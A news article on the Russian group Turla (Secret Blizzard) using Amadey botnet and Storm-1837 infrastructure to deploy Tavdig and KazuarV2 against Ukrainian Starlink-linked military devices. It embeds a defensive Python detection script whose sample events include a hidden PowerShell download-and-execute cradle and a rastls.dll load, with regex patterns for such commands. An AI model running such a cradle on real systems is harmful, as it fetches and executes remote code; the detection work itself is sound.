Russian Cyber-Espionage Group Turla Uses Other Hackers’ Infrastructure to Target Ukraine Military Devices

December 11, 2024

Russian cyber-espionage group Turla, also known as 'Secret Blizzard', is reportedly using the infrastructure of other threat actors to target Ukrainian military devices linked to Starlink. Microsoft and Lumen have recently unveiled the tactics of Turla, which is connected to Russia's Federal Security Service (FSB). The group has been using malware and servers of the Pakistani threat actor Storm-0156.

Microsoft has issued a new report detailing separate Turla operations that took place between March and April 2024, which targeted devices in Ukraine used in military operations. In this recent campaign, Turla used the infrastructure of the Amadey botnet and another Russian hacking group known as 'Storm-1837' to deploy their custom malware, including Tavdig and KazuarV2, on Ukrainian systems. Microsoft has not confirmed whether Turla hijacked Amadey or bought access to the botnet.

Turla's attacks in Ukraine usually start with phishing emails carrying malicious attachments, Storm-1837 backdoors, or the Amadey botnet, which is used for payload deployment on infected devices. Amadey, a malware botnet, has been used for initial access and payload delivery since 2018. In the case of Turla, it is used to deploy custom reconnaissance tools on compromised devices and to download PowerShell droppers that load the threat group's custom malware, Tavdig ('rastls.dll').
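The chain described above (Amadey access, a PowerShell dropper, then the Tavdig DLL) can be approximated with two host-level checks. The script below is an added example written for this page, not a query from Microsoft's or Lumen's reporting: it runs over constructed process-creation events (the pipe-delimited format, hostnames, paths and URL are all made up for the demo), flags PowerShell invocations that combine evasion switches with a download cradle, flags any command line that references the filename 'rastls.dll' (the only identifier taken from the article), and escalates when both fire on the same host within ten minutes.

```python
"""Triage of constructed process-creation events for the dropper-then-Tavdig
pattern. Only the DLL name 'rastls.dll' comes from the reporting; every other
pattern, threshold and sample value is an assumption made for this example."""
import re
from datetime import datetime, timedelta

# Constructed sample events: "timestamp|host|parent_image|image|command_line"
SAMPLE_EVENTS = [
    "2024-03-14T09:12:01Z|ws-17|explorer.exe|outlook.exe|outlook.exe /recycle",
    "2024-03-14T09:13:40Z|ws-17|outlook.exe|powershell.exe|powershell.exe -nop -w hidden "
    "-c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
    "2024-03-14T09:14:05Z|ws-17|powershell.exe|rundll32.exe|"
    "rundll32.exe C:\\Users\\u\\AppData\\Roaming\\rastls.dll,#1",
    "2024-03-14T10:02:11Z|ws-22|explorer.exe|powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1",
    "2024-03-14T11:30:00Z|ws-09|svchost.exe|rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL",
]

# Rule 1: a PowerShell download cradle combined with common evasion switches.
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer)", re.I)
EVASION_RE = re.compile(
    r"(-enc\w*\s|-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|executionpolicy\s+bypass)", re.I)
# Rule 2: the Tavdig filename named in the report.
TAVDIG_DLL_RE = re.compile(r"\brastls\.dll\b", re.I)
# Assumed correlation window between the dropper and the DLL execution.
CHAIN_WINDOW = timedelta(minutes=10)


def parse_event(line):
    """Split one constructed event line into a dict with a parsed timestamp."""
    ts, host, parent, image, cmd = line.split("|", 4)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "host": host,
            "parent": parent.lower(), "image": image.lower(), "cmd": cmd}


def classify(ev):
    """Return the list of rule names that match a single event."""
    hits = []
    if ev["image"] == "powershell.exe" and CRADLE_RE.search(ev["cmd"]) and EVASION_RE.search(ev["cmd"]):
        hits.append("powershell_download_cradle")
    if TAVDIG_DLL_RE.search(ev["cmd"]):
        hits.append("tavdig_dll_name")
    return hits


def scan(lines):
    """Apply both rules in time order and escalate cradle -> rastls.dll on one host."""
    events = sorted((parse_event(l) for l in lines), key=lambda e: e["ts"])
    findings = []
    last_cradle = {}  # host -> timestamp of the most recent cradle hit
    for ev in events:
        for rule in classify(ev):
            severity = "medium"
            if rule == "powershell_download_cradle":
                last_cradle[ev["host"]] = ev["ts"]
            elif rule == "tavdig_dll_name":
                severity = "high"
                t0 = last_cradle.get(ev["host"])
                if t0 is not None and ev["ts"] - t0 <= CHAIN_WINDOW:
                    rule, severity = "dropper_then_tavdig_chain", "critical"
            findings.append({"host": ev["host"], "ts": ev["ts"].isoformat(),
                             "rule": rule, "severity": severity, "cmd": ev["cmd"]})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["host"], finding["rule"], "::", finding["cmd"])
```

On the constructed input the script yields two findings for ws-17: a medium cradle hit, then the critical chain finding 25 seconds later; the legitimate `-File backup.ps1` run and the `shell32.dll` control-panel launch produce nothing. In a real deployment the filename match is the brittle part (the attacker controls it), so the cradle-plus-evasion rule and the host correlation are what carry the detection once the name changes.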

Microsoft has observed 'Secret Blizzard' downloading its custom reconnaissance or survey tool. This tool is selectively deployed to devices of further interest to the threat actor, for example devices egressing from Starlink IP addresses, a common signature of Ukrainian front-line military devices. The Starlink devices were presumably targeted to gather intelligence on front-line military activities, which aligns with Turla's role at the FSB.

Microsoft's report also connects Turla with another Russian threat actor known as Storm-1837, which, according to Microsoft, has previously focused on devices used by Ukrainian drone operators. Turla was seen using Storm-1837's PowerShell backdoor named 'Cookbox', which Storm-1837 deployed in Ukraine in January 2024 by exploiting the WinRAR flaw CVE-2023-38831. Turla's custom malware families were later deployed on those systems, indicating that Storm-1837 was either hijacked by Turla or collaborated with it to deliver Turla's payloads.

Tavdig and KazuarV2 are key elements of Turla's malware arsenal, playing distinct but complementary roles in their latest espionage campaign. Tavdig is a lightweight, modular backdoor designed to establish an initial foothold, conduct surveillance, and deploy additional payloads. KazuarV2, on the other hand, is Turla's more advanced, stealthy backdoor, designed for long-term intelligence collection, command execution, and data exfiltration. Microsoft advises defenders to refer to their proposed mitigations and hunting queries in the report, which cover this particular Turla operation and the group's broader activities.
